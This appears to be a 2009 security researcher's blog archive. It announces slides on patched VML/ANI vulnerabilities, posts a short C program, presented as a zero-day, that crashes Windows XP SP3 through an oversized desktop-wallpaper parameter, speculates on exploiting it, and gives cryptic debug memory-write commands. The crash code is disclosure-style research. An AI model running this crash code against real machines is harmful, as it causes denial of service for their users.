It is time to release an old presentation about the VML and ANI vulnerabilities that were patched by ZERT. It explains the vulnerabilities and how they were closed. It is somewhat very technical, Assembly is required if you wanna really enjoy it. I also gave a talk using this presentation in CCC 2007. It so happened that I wrote the patches, with the extensive help of the team, of course.
Archive for February, 2009
VML + ANI ZERT Patches
Tuesday, February 3rd, 2009Oh No, My XPSP3
Monday, February 2nd, 2009#include <windows.h>
int main()
{
WCHAR c[1000] = {0};
memset(c, 'c', 1000);
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);
WCHAR b[1000] = {0};
SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);
return 0;
}
Two posts ago I talked about vulnerabilities. So here’s some Zero Day. This will crash your system, unless you’re on Vista (which is already immune to it). And why the heck on SP3 we are still having this thing not closed yet?
It might be exploitable, I didn’t research it any further than the BSOD of the security cookie…Maybe on some compilations without /GS it can be easily exploited. Or maybe overriding enough of the stack to trigger an exception could be it.
“Remember to let her into your heart,
Then you can start to make it better” – The Beatles.
Escape
Sunday, February 1st, 2009Wanted to share this with the world:
e 0:0 cc
e 100 c4 c4 54 27
